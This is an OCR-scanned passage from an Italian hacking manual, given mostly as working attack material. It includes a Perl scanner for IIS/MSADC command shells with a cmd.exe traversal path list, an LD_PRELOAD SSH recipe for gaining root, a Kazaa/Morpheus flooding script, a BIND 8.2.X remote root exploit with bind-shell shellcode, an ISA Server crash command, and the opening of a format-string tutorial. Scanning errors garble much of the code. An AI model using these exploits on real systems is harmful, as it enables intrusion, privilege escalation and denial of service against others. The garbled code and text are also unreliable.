$line =~ s/\%20$//; 

if ( $no_cd ) { 

$url= "http : //$host/$path ?/c+$_ [0] "; 
} else { 

$url="http : //$host/$path?/c+cd%20$wd%20$cmd_sep$_ [0] "; 

} 

my $result = sendRequest ($url) ; 
parseResult ($result) ; 

} else { 
next; 

} 

ì 
# 

# Actual processing 
# 

$s = ' '; 
$ v = ' <; 

$P = ' '; 
$f = ' •; 
$e = ' •; 
$h = ' •; 
$o = ' •; 
$q = ' '; 

$a = ' path_to_cmd ' ; 
$c = ' '; 
$p_exists = ' ' ; 

GetOptions( 'p=s' => \$p, 's' => \$s, 'V => \$v, 'f => \$f, 'e' => 
\$e, 'h' => \$h, 'o' => \$o, 'q' => \$q, 'a=s' => \$a, 'C => \$c ); 

if ( $p ) { $p_exists = '1'; } 

if ( (length($s . $p_exists . $h) != 1 ) \\ ( (§ARGV != 1) SS ( ! $h ) 
)) { 
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print "Usage: $0 { -s [ev] \ -[evf]p <path> \ -h } [-oq] 
[<host>] \n"; 
exit; 

} 

$wd = "\\"; 
$no_cd = ' ' ; 
$cmd_sep = ' &&' ; 

if ( !$q ) { print "Welcome to US Shell $version \n" ; } 

$term = new Terni; :ReadLine 'US Shell ' ; 
$term->ornaments (0) ; 

if ( $o ) { 

if ( !$q ) { print "Using old libwww-perl behaviour ( < 5.60 ) \n" ; 

} 

LWP: -.Protocol : : implementor ( 'http ' , 'LWP: -.Protocol : -.httplO ' ) ; 
eval { 

require LWP: -.Protocol: :httpslO; 

LWP: -.Protocol : -.implementor ( 'https ' , 'LWP: -.Protocol : -.httpslO ' ) ; 

}; 



if ( $h ) { 

print "Usage : 

print "Usage: $0 { -s [èva <file>] \ -[evf] <path> \ -h } [-oqc] 
[<host>] 

print "\t-h : prints this help\n"; 

print "\t-s <host> : scans <host> for a command shell\n"; 

print "\t\t -v : verbose, prints paths as they are tried\n" ; 

print "\t\t -e : verbose errors, prints server reply as string\n" ; 

print "\t\t -a <file> : alternate file for path to cmd.exe 
list\n\t\t (defaults to path_to_cmd in locai dir) \n"; 

print "\t-p <path> <host> : seeks shell at <path> on <host>\n"; 

print "\t\t -v : verbose, prints paths as they are tried\n" ; 

print "\t\t -e : verbose errors, prints server reply as string\n" ; 

print "\t\t -f : force, ignores path checking on specified path\n"; 

print "\n"; 

print "\t -o : old-style libwww-perl, needed for use with libwww- 
perl >= 5.60\n"; 

print "\t -q : quiet (don't use with -v or -V)\n"; 

print "\t -c : check only, don't generate shell \n"; 

print "\n"; 



if ( $p ) { 

$host = $ARGV[0]; 

if ( $f && !$c) { $path = $p; runShell ($path) ; } 
if ( ! checkPath($p) ) { 

if ( $c ) { print "Executable not found at $p\n"; exit; } 

print "Quitting US Shell. \n"; 

exit 

} 

$path = $p; 

if ( !$c ) { runShell ($path) ; } 



if ( $s ) { 

$host = $ARGV[0]; 

if ( !$q ) { print "Scanning $host for a command shell . . . \n"; } 
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open (PATH, "$a") or die "Can't open patii list file : $!\nPlease 
check you have not entered an invalid patii \n" ; 
while (my $line = <PATH>) { 
chomp $line; 

if ( checkPath($line) ) { 

if ( $c ) { print "Executable found at $line\n"; next; } 
$path = $line; 

if ( !$c ) { runShell ($path) ; } 
last; 

} 

} 

if ( !$c ) { print "No command shell found, quitting. \n"; } 



Il seguente file è nominato path_to_cmd e deve risiedere nella stessa directory dello script in 
peri. 

Da questo possiamo vedere che il BUGS che cerca di sfruttare lo scipt è MSADC. 



/scripts/root . exe 
/MSADC/root . exe 
/c/winnt/system32/cmd. exe 
/d/winnt/ system32 /cmd . exe 

/ script s/ . .%cl%9c. .%cl%9c. . /winnt/system32/cmd.exe 
/ script s/ . . %cO%af. . %cO%af. . /winnt/system32/cmd. exe 
/scripts/ . .%cl%lc. .%cl%lc. . /winnt/system32/cmd. exe 
/ script s/ . . %255c. . %255c. . /winnt/system32/cmd . exe 
/scripts/ . . %2f. . %2f. . /winnt/system32/cmd.exe 
/_vti_bin/ . . %cl%9c. . %cl%9c. . /winnt/system32/cmd . exe 
/_vti_bin/ . . %cO%af. . %cO%af. ./winnt/system32/cmd.exe 
/_vti_bin/ . . %cl%lc. . %cl%lc. ./winnt/system32/cmd.exe 
/_vti_bin/ . . %255c. . %255c. . /winnt/system32/cmd.exe 
/_vti_bin/ . . %2f. . %2f. . /winnt/system32/cmd. exe 

/_vti_bin/ . . %255c. ./. . %255c . ./. . %255c. . /winnt/system32/cmd. exe 

/msadc/ . . %cl%9c. . %cl%9c. . /winnt/system32/cmd . exe 

/msadc/ . . %cO%af. . %cO%af. . /winnt/system32/cmd . exe 

/msadc/. . %cl%lc. . %cl%lc. . /winnt/system32/cmd . exe 

/msadc/. . %255c. . %255c. . /winnt/system32/cmd. exe 

/msadc/ . . %2f . . %2f . . /winnt/system32/cmd. exe 

/msadc/ . . %255c. ./• • %255c. ./• • %255c. . /winnt/ ' system32Zcmd.exe 



Un bugs per la scalata dei privilegi in Linux 7.x con SSH 
Un bugs legato al login di Linux permette di acquisire diritti sulla macchina. 
I sistemi che posseggono questo problema sono: 

Slackware 7 . 1 con OpenSSH3 . Opl 
RedHat 7 . 1 con OpenSSH_2 . 9p2 

RedHat 7.2 con OpenSSH-3 . 0 . lpl (thx scorpio) 



Create un file lib.c con questo contenuto: 



^include <stdio .h> 




int setuid(int uid) { 




printf ("setuid () called. . 


. \n"); 


seteuid(O) ; 





Compilatelo con: 
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gcc -c -o lib.o llb.c 

ld -shared -o libroot.so lib.o 

chmod 755 . /libroot . so 

A questo punto dovete avere un login nal sistema e quindi dopo esserci entrato dovrete 
creare il seguente file: 

$HOME/. ssh/authorized_keys 

con dentro : 

environment="LD_PRELOAD=<your home> / libroot . so" <your public key> 

Quando sshd riceve la vostra connessione, questa esporta la variabile d'ambiente ce avete 
settato dentro al file. 

Questa viene settata PRIMA che voi facciate il login. 

In ogni modo questa esegue una funzione setuid mediante la cali a seteuid(O). 
$ id 

uid=1000 (war) gid=100 (users) groups=100 (users) 
$ ssh war@localhost 

Inserite la passphrase per key '/home/war/.ssh/id_dsa': 
sh-2.04# id 

uid=0 (root) gid=100 (users) groups=100 (users) 



Questo metodo funziona anche da remoto. 

Chiaramente il tutto serve a scalare i dirtti di un sistema per cui dovete avere un login iniziale. 
In altre parole va bene in quei sistemi aziendali dove voi non valete nulla, nelle università o 
comunque in un sistema dove anche solo a livello di guest ma ci entrate. 



Kazaa o M orphes 

Queste due utilties legate al file sharing possiedono delle backdoor che possono essere 
utilizzate per accedere abusivamente ai sistemi di chi li usa. 
Occo il programma per farlo : 

# .' /usr/bln/perl 
# 

#Kazaa/Morpheus Denial of Service Attack 
#Coded by Paul Godfrey 
#PaulG@Crackdealer . com 
§ 

#Problem: Both Kazaa and Morpheus filesharing applications nave "backdoors" 
#which allow anonymous file access to their shared folder. What does this 
have 

#to do with Denial of Service? Unlike connections made front other users 
#of the applications , the number of connections to the backdoor cannot be 
#regulated or detected by the client . This obviously will allow us to flood 
the 

#server with reguest s and therefore use up ali of the available bandwidth. 
§Also due to the fact that most users have setup their firewall privileges 
so 

ithat Kazaa or Morpheus is allowed access to open connections to outside 
sources 

#this attack will bypass most personal firewall clients such as Zone Alarm. 
§ 

#Enjoy. 
§ 

§Usage: ./km. pi -h victimip 
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use Socket; 

use Getopt : : Std; 

getopts ( "h :", \ %args) ; 

prlnt ( " \nK/M Denlal of Service\n") ; 
if (Idefined $args{h} ) { 
prlnt ( "Usage : km.pl -h victimip\n\n") ; 
exit; } 

$host = $args{h} ; 

$target = lnet_aton ($host) Il die ( " inet_aton problems; host doesn't 
exlst?") ; 

$trash="A"xlOO; 

&exec_cmd ($command) ; 

sub exec_cmd { 

for ($count=l ; $count<=1000 ; $count++) 
{ 

sendraw("GET /\"$trash\" HTTP/1 . 0\n\n ") ; 

prlnt ("I ") ; 

} 

prlnt ( " \nData Sent . \n \n ") ; 
} 

sub sendraw { 
my ($pstr)=@_; 

socket (S, PF_INET , SOCK_STREAM, getprotobyname ('tcp') / IO) Il 
die ( "Socket problems \n ") ; 

lf(connect (S,pack "SnA4x8", 2, 1214, $target) ) { 
my @ln; 

select(S); $1=1; prlnt $pstr; 

whlle(< S >) { push @ln, $_; 

prlnt STDOUT "." if (deflned $args{X}) ; } 

select (STDOUT) ; dose (S) ; return @in; 

} else { die("Can't connect . . . \n") ; } 

} 



DNS e Bind 

Uno dei sistemi che nel tempo ha creato più problemi è sicuramente il bind utilizzato per la 
gestione dei DNS all'interno dei servers. 

Tra Le tipologie di exploits a cui questo meccanismo è maggiormente soggetto sono 
sicuramente quelli legati alle metodologie Dos ovvero quelle indirizzate a bloccare il servizio. 
Chiaramente in questo caso parliamo di uno dei servizi fondamentali nell'ambito di un sistema 
in quanto il blocco di questo farebbe si che i servers che si supportano su questo sistema per 
la risoluzione dei domini tramite interrogazione dei servers DNS non potrebbe essere 
eseguito. 

Teniamo sempre ben presente che le attività legate a questo servizio nell'ambito di un server 
avvengono in continuazione anche perché questo viene utilizzato anche per risolvere i 
servers stessi interni nell'ambito di una struttura di dominio relativo anche ad una sola 
azienda. 

Usando analizzatori della sicurezza, come ad esempio RETINA, i messaggi legati ai problemi 
presenti nel sistema BIND sono sempre numerosissimi. 

Un esempio di software in grado di explotare un sistema remoto utilizzante questo sistema è 
quello che segue: 



/* 








* 
* 


lame named 


8.2.X remote exploit by 




* 


Ix 


[adresadeforward@yahoo . 


com] (the master of jmpz) , 


* 
* 


lucysoft 


[lucysoft@hotmail . com] 


(the master of queries) 
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* this exploits the named INFOLEAK and TSIG bug (see 
http: //www. isc. org/products/BIND/bind-security . html) 

* linux only shellcode 

* this is only for demo purposes, we are not responsable in any way for what you do 
with this code. 



flamez - canaris 

greetz - blizzard, netman. 

creditz - anathema <anathema@hack . co . za> for the originai shellcode 

— additional code ripped from statdx exploit by ronln 



*/ 



iinclude 
iinclude 
iinclude 
iinclude 
iinclude 
iinclude 
iinclude 
iinclude 
iinclude 
iinclude 
iinclude 
iinclude 
iinclude 



<unistd. h> 
<stdio . h> 
<stdlib.h> 
<signal . h> 
<time . h> 
<string . h> 
<ctype . h> 
<netdb.h> 
<sys/time . h> 
<sys/types . h> 
<sys/socket . h> 
<arpa/inet . h> 
<arpa/ nameser . h> 



idefine max (a,b) ( (a) > (b) ? (a) : (b) ) 



idefine BUFFSIZE 4096 



int argevdispl, argevdisp2; 



char shellcode [] 
/* main: */ 



"\xeb\x7b" 


/* 


jmp callz 




*/ 


// 


2 - 


2 


/* start: */ 


















n \x5e " 


/* 


popi 


%esi 




*/ 


// 


1 - 


3 


/* socket() */ 


















"\x29\xc0" 


/* 


subì 


%eax, 


%eax 


*/ 


// 


2 - 


5 


"\x89\x46\xl0" 


/* 


movi 


%eax, 


0x10 (%esi) 


*/ 


// 


3 - 


8 


"\x40" 


/* 


incl 


%eax 




*/ 


// 


1 - 


9 


"\x89\xc3 " 


/* 


movi 


%eax, 


%ebx 


*/ 


// 


2 - 


11 


"\x89\x46\x0c" 


/* 


movi 


%eax, 


OxOc (%esi) 


*/ 


// 


3 - 


14 


"\x40" 


/* 


incl 


%eax 




*/ 


// 


1 - 


15 


"\x89\x46\x08" 


/* 


movi 


%eax, 


0x08 (%esi) 


*/ 


// 


3 - 


18 


"\x8d\x4e\x08" 


/* 


leal 


0x08 (ì 


tesi) , %ecx 


*/ 


// 


3 - 


21 


"\xb0\x66" 


/* 


movb 


$0x66, 


%al 


*/ 


// 


2 - 


23 


"\xcd\x80" 


/* 


int $0x80 




*/ 


// 


2 - 


25 


/* bind() */ 


















n \x43" 


/* 


incl 


%ebx 




*/ 


// 


1 - 


26 


"\xc6\x46\xl0\xl0" 


/* 


movb 


$0x10, 


0x10 (%esi) 


*/ 


// 


4 - 


30 


"\x66\x89\x5e\xl4" 


/* 


movw 


%bx, 0x14 (%esi) 


*/ 


// 


4 - 


34 


"\x88\x46\x08" 


/* 


movb 


%al, 0x08 (%esi) 


*/ 


// 


3 - 


37 


"\x29\xc0" 


/* 


subì 


%eax, 


%eax 


*/ 


// 


2 - 


39 


"\x89\xc2" 


/* 


movi 


%eax, 


%edx 


*/ 


// 


2 - 


41 


"\x89\x46\xl8" 


/* 


movi 


%eax, 


0x18 (%esi) 


*/ 


// 


3 - 


44 


"\xb0\x90" 


/* 


movb 


$0x90, 


%al 


*/ 


// 


2 - 


46 


"\x66\x89\x46\xl6" 


/* 


movw 


%ax, 0x16 (%esi) 


*/ 


// 


4 - 


50 


"\x8d\x4e\xl4" 


/* 


leal 


0x14 (%esi), %ecx 


*/ 


// 


3 - 


53 


"\x89\x4e\x0c" 


/* 


movi 


%ecx, 


OxOc (%esi) 


*/ 


// 


3 - 


56 


"\x8d\x4e\x08" 


/* 


leal 


0x08 (%esi), %ecx 


*/ 


// 


3 - 


59 


// 2 jump + 1+5 free + 1 


















"\xb0\x66" 


/* 


movb 


$0x66, 


%al 


*/ 


// 


2 - 


61 


"\xcd\x80" 


/* 


int $0x80 




*/ 


// 


2 - 


2 


/* listen() */ 


















"\x89\x5e\x0c" 


/* 


movi 


%ebx, 


OxOc (%esi) 


*/ 








n \x43" 


/* 


incl 


%ebx 




*/ 








"\x43" 


/* 


incl 


%ebx 




*/ 








"\xb0\x66" 


/* 


movb 


$0x66, 


%al 


*/ 








"\xcd\x80" 


/* 


int $0x80 




*/ 
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"\x89\x56\x0c" 




/* 


movi %edx, OxOc (%esl) 


*/ 


// 


3 - 


5 


n \x89\x56\xl0" 




/* 


movi %edx, 0x10 (%esi) 


*/ 


// 


3 - 


8 


"\xb0\x66" 




/* 


movb $0x66, %al 


*/ 


// 


2 - 


10 


"\x43" 




/* 


Incl %ebx 


*/ 


// 


1 - 


11 


"\xcd\x80" 




/* 


int $0x80 


*/ 


// 


1 - 


12 


/* dup2 (s, 0) ; dup2 (s, 


1); dup2(s, 2); 


*/ 












n \x86\xc3 " 




/* 


xchgb %al, ibi 


*/ 


// 


2 - 


14 


"\xb0\x3f" 




/* 


movb $0x3f, %al 


*/ 


// 


2 - 


16 


"\x29\xc9" 




/* 


subì %ecx, %ecx 


*/ 


// 


2 - 


18 


"\xcd\x80" 




/* 


int $0x80 


*/ 


// 


2 - 


20 


"\xb0\x3f" 




/* 


movb $0x3f, %al 


*/ 


// 


2 - 


22 


"\x41" 




/* 


incl %ecx 


*/ 


// 


1 - 


23 


"\xcd\x80" 




/* 


int $0x80 


*/ 


// 


2 - 


25 


"\xb0\x3f" 




/* 


movb $0x3f, %al 


*/ 


// 


2 - 


27 


"\x41" 




/* 


incl %ecx 


*/ 


// 


1 - 


28 


"\xcd\x80" 




/* 


int $0x80 


*/ 


// 


2 - 


30 


/* execve() */ 
















"\x88\x56\x07" 




/* 


movb idi, 0x07 (%esi) 


*/ 


// 


3 - 


33 


"\x89\x76\x0c" 




/* 


movi %esi, OxOc (%esi) 


*/ 


// 


3 - 


36 


"\x87\xf3" 




/* 


xchgl %esi, %ebx 


*/ 


// 


2 - 


38 


"\x8d\x4b\x0c" 




/* 


leal OxOc (%ebx) , %ecx 


*/ 


// 


3 - 


41 


"\xbO\xOb" 




/* 


movb $OxOb, %al 


*/ 


// 


2 - 


44 


"\xcd\x80" 




/* 


int $0x80 


*/ 


// 


2 = 


46 


" \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 














// 2 jump + 1+5 free + 


1 














/* callz: */ 
















"\xe8\x70 \xff\xff\xff" 




/* 


cali start 


*/ 


// 


5 - 


51 


"/bin/sh\0"; 










// 


8 - 


59 



// {0, "8.2.2-P5 - RBdhat 6.2 (Zoot) boot", 0xbffffa88, 28, 0x080d7cd0, 

0x40111704, 0x330, 6), 

unsigned long resolve_host (char* host) 
{ 

long res; 

struct hostent* he; 

if (0 > (res = inet_addr (host) ) ) 
{ 

if ('.(he = gethostbyname (host ) ) ) 

return (0) ; 
res = * (unsigned long*) he->h_addr; 

} 

return (res) ; 

} 

void 

runshell (int sockd) 
{ 

char buff[1024] ; 
int fmax, ret; 
fd_set fds; 

fmax = max (fileno (stdin) , sockd) + 1; 
send (sockd, "uname -a; id;\n", 15, 0) ; 

for(;;) 
{ 

FD_ZERO (Sfds) ; 

FD_SET (fileno (stdin) , Sfds); 
FD_SET (sockd, Sfds); 

if (select (fmax, &fds, NULL, NULL, NULL) < 0) 
{ 

exit (EXIT_FAILURE) ; 

) 



if (FD_ISSET (sockd, Sfds) ) 
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if ( (ret = recv(sockd, buff, sizeof buff, 0) ) < 0) 
{ 

exit (EXIT_FAILURE) ; 

ì 

if(!ret) 
{ 

fprintf (stderr, "Connection closed\n") ; 
exit (EXIT_FAILURE) ; 

} 

write (fileno (stdout) , buff, ret) ; 

} 

if (FD_ISSET (fileno (stdin) , &fds) ) 
{ 

bzero (buff, sizeof buff) ; 

ret = read (fileno (stdin) , buff, sizeof buff); 

if (sendfsockd, buff, ret, 0) != ret) 

{ 

fprintf (stderr, "Transmission loss\n") ; 
exit (EXIT_FAILURE) ; 

} 

} 

} 

} 



connection (struct sockaddr_in host) 
{ 

int sockd; 

host . sin__port = htons (36864) ; 

printf ("connecting. .\n"); 
usleep (2000) ; 

if( (sockd = socket (AF_ INET, SOCK_STREAM, IPPROTO^TCP) ) < 0) 
{ 

exit (EXIT_FAILURE) ; 

) 

if (connect (sockd, (struct sockaddr *) Shost, sizeof host) != -1) 
{ 

printf ("wait for your shell..\n"); 
usleep (500) ; 
runshell (sockd) ; 

} 

else 
{ 

printf ("error : named not vulnerable or wrong offsets used\n") ; 

} 

dose (sockd) ; 



int infoleak_qry (char* buff) 
{ 

HEADER* hdr; 

int n, k; 

char* ptr; 

int qry_space = 12; 

int dummy_names = 7; 

int evil_size = htons (Oxff) ; 

memset (buff, 0, BUFFSIZE) ; 
hdr = (HEADER* ) buff ; 

hdr—>id = htons (Oxbeef) ; 
hdr->opcode = IQUERY; 
hdr->rd = 1; 

hdr->ra = 1; 

hdr—>qdcount = htons (0) ; 
hdr—>nscount = htons (0) ; 
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ptr = buff + sizeof (HEADER) ; 
n = 62; 

far (k = 0 ; k < dummy names; k++) 
{ 

*ptr++ = n; 
ptr += n; 

} 

ptr += INT16SZ; 

PUTSHORT(htons(l/*ns_t_a*/) , ptr); /* type */ 

PUTSHORT (htons (T_A) , ptr); /* class */ 

PUTLONG (htons (1) , ptr); /* ttl */ 

PUTSHORT (ev±l_size, ptr) ; /* our *evil * size */ 

return (ptr - buff + qry__space) ; 



Int evll_query (char* buff, Int offset) 
{ 

int lameaddr, shelladdr, rroffsetidx, rrshellidx, deplshellcode, offsetO; 

HEADER* hdr; 

char *ptr; 

int k, bufflen; 

u_int n, m; 

u_short s; 

int i; 

int shelloff, shellstarted; 
int towrite, ourpack; 
int n__dummy_rrs = 7; 

shelladdr = offset - 0x200; 

lameaddr = shelladdr + 0x330; 

ourpack = offset - 0x250 + 2; 

towrite = (offset & ~0xff) - ourpack - 6; 

printf("§ %x newebp\n", offset S ~0xff); 
printf ("§ %x towrite\n", towrite) ; 



rroffsetidx = towrite / 70; 

offsetO = towrite - rroffsetidx * 70; 

printf ("+ %x rr recidx\n", rroffsetidx) ; 
printf ("+ %x offset\n", offsetO); 

if ((offsetO > 53) Il (rroffsetidx > 6)) 
{ 

printf ( "could not write our data in buffer\n") ; 
return (-1) ; 

} 

rrshellidx = 1; 
deplshellcode = 2; 

hdr = (HEADER*) buff; 

memset (buff, 0, BUFFSIZE) ; 

/* complete the header */ 

hdr—>id = htons (Oxdead) ; 
hdr->opcode = QUERY; 
hdr->rd = 1; 

hdr—>ra = 1; 
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hdr->ancount = htons(O); 
hdr—>arcount = htons (1) ; 

ptr = buff + sizeof (HEADER) ; 

shellstarted = 0; 
shelloff = 0; 

n = 63; 

for (k = 0 ; k < n_dummy__rrs ; k++) 
{ 

// printf ("* rr: %d\n", k) ; 

*ptr++ = (char)n; 

for(i = 0; i < n-2; 
{ 

if ( (k == rrshellidx) && (i == deplshellcode) SS ! shellstarted) 
{ 

printf ("* injecting shellcode\n" , k) ; 
shellstarted = 1; 

} 

if C (k == rroffsetidx) SS (i == offsetO + 0) ) 
{ 

printf ( "# %x stackfrm\n ", lameaddr) ; 

//cai ler's frame 

*ptr++ = lameaddr S OxOOOOOOff; 

i++; 

*ptr++ = (lameaddr S OxOOOOffOO) » 8; 
i++; 

*ptr++ = (lameaddr S OxOOffOOOO) » 16; 
i++; 

*ptr++ = (lameaddr S OxffOOOOOO) » 24; 

} 

else if ((k == rroffsetidx) SS (i == offsetO + 8)) 
{ 

printf ("§ args %x, %x\n", argevdispl, argevdisp2) ; 
//evDispatch args 



*ptr++ 




argevdispl S 




OxOOOOOOff; 






i++; 

*ptr++ 

i++; 




(argevdispl 


s 


OxOOOOffOO) 


» 


8; 


*ptr++ 




(argevdispl 


s 


OxOOffOOOO) 


» 


16; 


i++; 
*ptr++ 




(argevdispl 


s 


OxffOOOOOO) 


» 


24; 


i++; 
*ptr++ 




argevdisp2 & 




OxOOOOOOff; 






i++; 
*ptr++ 




(argevdisp2 


s 


OxOOOOffOO) 


» 


8; 


i++; 














*ptr++ 




(argevdisp2 


s 


OxOOffOOOO) 


» 


16; 


i++; 














*ptr++ 




(argevdisp2 


s 


OxffOOOOOO) 


» 


24; 



} else 

if ((k == rroffsetidx) SS (i == offsetO + 4)) 
( 

printf ("i %x shellcode\n", shelladdr) ; 
//shellcode 

*ptr++ = shelladdr S OxOOOOOOff; 
i++; 

*ptr++ = (shelladdr S OxOOOOffOO) » 8; 
i++; 

*ptr++ = (shelladdr S OxOOffOOOO) » 16; 
i++; 

*ptr++ = (shelladdr S OxffOOOOOO) » 24; 

) 

else 
( 

if (shellstarted) 
{ 

*ptr++ = shellcode [shelloff ++] ; 

) 

else 
{ 



*ptr++ = i; 
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*ptr++ = Oxeb; 

if (k == 0) 
{ 

*ptr++ = 0x09; //jmp 3 
m = 2; 

*ptr++ = (char)m; 
for(± = 0; i < m; i++) 
{ 

*ptr++ = i; 

; 

else 
{ 

*ptr++ = 0x07; //jmp 1 

} 

*ptr++ = OxcO; /*NS__CMPRSFLGS*/ 
ptr += 5; 

} 

s = htons (Oxfa) /* ns_t_ts±g */; 
PVTLONG(s, ptr); 

for (k = 0; k < 1; k++) 
{ 

*ptr++ = 0x90; 

} 

bufflen = ptr - buff; 
return (bufflen) ; 

} 



long xtract_offset (char* buff) 
{ 

long ret, idx, now; 

idx = 0x214; 
now = 0; 

ret = *( (long*) &buff[ idx] ) ; 

if ((ret > OxbfffOOOO) SS (ret < OxcOOOOOOO) ) 
( 

now = 1; 

} 

while ((idx < 0x400) SS (!now II ! ( (ret > OxbfffOOOO) SS (ret < OxcOOOOOOO) )) ) 
{ 

idx += 4; 

ret = *( (long*) Sbuff [idx] ) ; 

if (ret == 1) 

{ 

now = 1; 

} 

} 

argevdispl = 0x080d7cd0; 

argevdisp2 = *( (long*) Sbuff [0x264] ) ; 

return (ret) ; 

} 



int main(int argo, char* argv[]) 
{ 

struct sockaddr_in sa; 
int sock; 
long address; 
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int len, i; 
long offset; 
socklen__t reclen; 

printf ("named 8.2.X (< 8.2.3-REL) remote root exploit by LucySoft, Ix\n\n") ; 

address = 0; 
if (argo < 2) 
{ 

printf ( "usage : %s host\n", argv[0] ) ; 
return (-1) ; 

} 

if (! (address = resolve_host (argv[l] ) ) ) 
( 

printf ( "unable to resolve %s, try using an IP address\n", argv[l] ) ; 
return (-1) ; 

ì 

sa . sin_family = AF_INET; 

if (0 > (sock = socket (sa. sin_family, SOCK__DGRMi, 0) ) ) 
( 

return (-1) ; 

} 

sa . sin_family = AF_INET; 
sa . sin_port = htons (53) ; 
sa . sin_addr . s_addr= address; 



len = infoleak^qry (buff) ; 

len = sendto(sock, buff, len, 0 , (struct sockaddr *)&sa, sizeof(sa)); 

if (len < 0) 

{ 

printf ( "unable to send iquery\n ") ; 
return (-1) ; 

} 

reclen = sizeof (sa) ; 

len = recvfrom(sock, buff, BUFFSIZE, 0, (struct sockaddr *)Ssa, S reclen) ; 

if (len < 0) 

{ 

printf ( "unable to receive iquery answer\n") ; 
return (-1) ; 

} 

printf ("iquery resp len = %d\n", len); 
offset = xtract__offset (buff) ; 

printf ("retrieved stack offset = %x\n", offset); 



len = evil_query (buff , offset) ; 

sendto(sock, buff, len, 0 , (struct sockaddr *)&sa, sizeof (sa)); 

if (0 > close(sock)) 
{ 

return (-1) ; 

} 

connection (sa) ; 
return (0) ; 

} 



Come bloccare I SA Server 

Come tutti sanno ISA server è l'ultimo prodotto derivato da Microsoft Proxy Server indirizzato 

a gestire la security in ambiente Microsoft. 

In altre parole il software svolge funzioni di proxy e di firewall. 

Ad ogni modo come tanti prodotti software anche questo è passibile di attacchi Dos. 
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Per poterlo explottare è necessario che questo sia configurato per usare la funzionalità da 

"Web Publishing" (inbound HTTP proxy to a web server). 

L'attacco può essere eseguito da postazione remota. 

Per perpetuare l'attacco è necessario inviare un path lungo al proxy. 



Inviando questa stringa sulla porta 80 di ISA Server si fa si che il componente 
W3PROXY.EXE termini con un access violation. 

Potete usare queasto comando : 

Drintf 'GET http://${HOST}/%s HTTP/1 .0\n\n' Vrepeat ${x} ${ 



dove: 



- printf è 1' utility di shell 

- ${HOST} è una variabile d'ambiente settata con 1' host che possiede ISA 
Server 

- . /repeat è un asemplice programma in C il cui listato è quello che segue 

- ${x} è un valore ASCII 

~ ${y} è il numero delle ripetizionidi ${x} 



/* 

* repeat. c — quick-n-dirty hack to output argv[2] Instances of the 

* character whose ASCII value is given as argv[l ] 
* 

* WARNING - this has absolutely no error checking! 
*/ 



^include <stdio.h> 



main (Int argo, char **argv) { 
int character; 
long repetitions, i; 

if ( argc != 3 ) { 

printf ( "usage : repeat char reps \n ") ; 
exit (1) ; 

} 

character = atoi (argv[l] ) ; 
repetitions = atol (argv[2] ) ; 



for (i = OL; i < repetitions; i++) { 
printf ("%c", character); 




Il comportamento di W3PROXY.EXE dipende dal valore di ${x} e dal valoredi ${y}. 
Con ${x} a 55, il seguente comportamento è osservato basandosi sul valore di ${y}: 

200: processes correctly, returns "404 Object Not Found" from target web 
server . 
200: returns 404 
250: returns 404 
254: returns 404 
255: returns "414 URL Too Long" 
260: returns 414 
300: returns 414 
2000: returns 414 
2100: returns 414 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



2200: returns 414 
2300: returns 414 

2300, repeated several tlmes: W3PROXY.EXE grows to 128MB of process size 
and 

is then terminated with an access violation . 
2350: W3PROXY.EXE is terminated on the first attempt . 



Format string attack 

Un altro tipo di attacco che sembra molto a quello dei buffers overflow è quello definito con il 
termine di format string attack. 

Il tutto si basa sulla metodologia che alcune funzioni del linguaggio C usano per formattare gli 
argomenti durante una stampa di questi. 

Genericamente una funzione come la printf() usa i seguenti argomenti : 



La prima parte, quella definita con il termine di stringa_di_formattazione, è una sequenza di 
caratteri alcuni dei quali vengono stampati staticamente mentre altri prendono gli argomenti 
specificati successivamente e li inseriscono applicandogli un cero formato nella posizione 
dove questi si trovano. 
Ad esempio i caratteri : 



indicherebbero che l'argomento dovrebbe essere stampato come stringa. 
L'esempio : 



char s[] = "Ciao"; 



Alcune volte I programmatori quando si trovano davanti al fatto di dover stampare un solo 
argomento costituito da un buffer di caratteri, invece di specificare la stringa di formattazione, 
come nell'esempio di prima, inseriscono solo NI buffer. 

printf (s); 

Ma prima di vedere i problemi che possono nascere dall'uso di printf dobbiamo rinfrescarci le 
idee sull'uso di questa. 

Con questa è possibile avere il numero di caratteri stampati a qualsiasi punto della sringa di 
formattazione. 

Quando il fomattatore "%n" è incontrato all'interno della stringa di formattazione il numero di 
caratteri presenti prima di questo viene inserito all'indirizzo passato come prossimo 
argomento. 

Ad esempio per ricavare l'offset dello spazio tra due numeri formattati : 

^include <stdio .h> 

void main (vid) 
{ 

int pos, x=12, y=34; 

printf ("%d %n%d\n", x, Spos, y) ; 

printf ("L'offset è a ; %d", pos) ; 

} 

F: \ TempWork>cl test . c 

Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 12 . 00 . 8804 for 
80x86 

Copyright (C) Microsoft Corp 1984-1998 . Ali rights reserved. 
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test . c 

Microsoft (R) Incrementai Linker Version 6.00.8447 
Copyright (C) Microsoft Corp 1992-1998 . Ali rights reserved. 



/out : test . exe 
test . obj 

F: \TempWork>test 
12 34 




Il calcolo avvien su quello che dovrebbe essere anche se per altri motivi avrebbe dovutto 
essere differente. 

Considerate il buffer di 20 caratteri e la richiesta di stampare il numero come un numero di 
1 00 cifre. 

Il valore restituito dalla funzione è 100 e non 20. 



^include <stdio.h> 



char buff[20]; 



void main (vid) 
{ 

int pos, x=12, y=34; 

sprintf (buff, "%.100d%n", x, &pos) ; 

printf ("L'offset e' a : %d", pos) ; 

ì 



F: \ TempWork>cl test . c 

Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 12 . 00 . 8804 for 
80x86 

Copyright (C) Microsoft Corp 1984-1998 . Ali rights reserved. 
test . c 

Microsoft (R) Incrementai Linker Version 6.00.8447 

Copyright (C) Microsoft Corp 1992-1998 . Ali rights reserved. 



/out : test . exe 
test . obj 

F: \TempWork>test 
L'offset e' a : 100 



Ora per spiegare il principio diamo un occhiata al programma che segue. 
/* 

* fmtme . c 

* Format a value into a fixed-size buffer 
*/ 

^include <stdio ,h> 
int 

main (int argc, char **argv) 
{ 

char buf[100]; 
int x; 

if(argc != 2) 
exit (1) ; 
x = 1; 

sprintf (buf, argv[l]); 
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buf [sizeof buf - 1] 


= 0; 




printf ("buffer (%d) : 


%s\n", strlen(buf), buf); 




printf("x is %d/%#x 


(@ %p) \n", x, x, &x); 




return 0; 





Spieghiamo solo I passi fondamentali del programma. 

Un valore passato sulla linea di comando da prompt viene formattato in un buffer a lunghezza 
fissa. 

Successivamente il buffer è formattato e viene messo in output. 

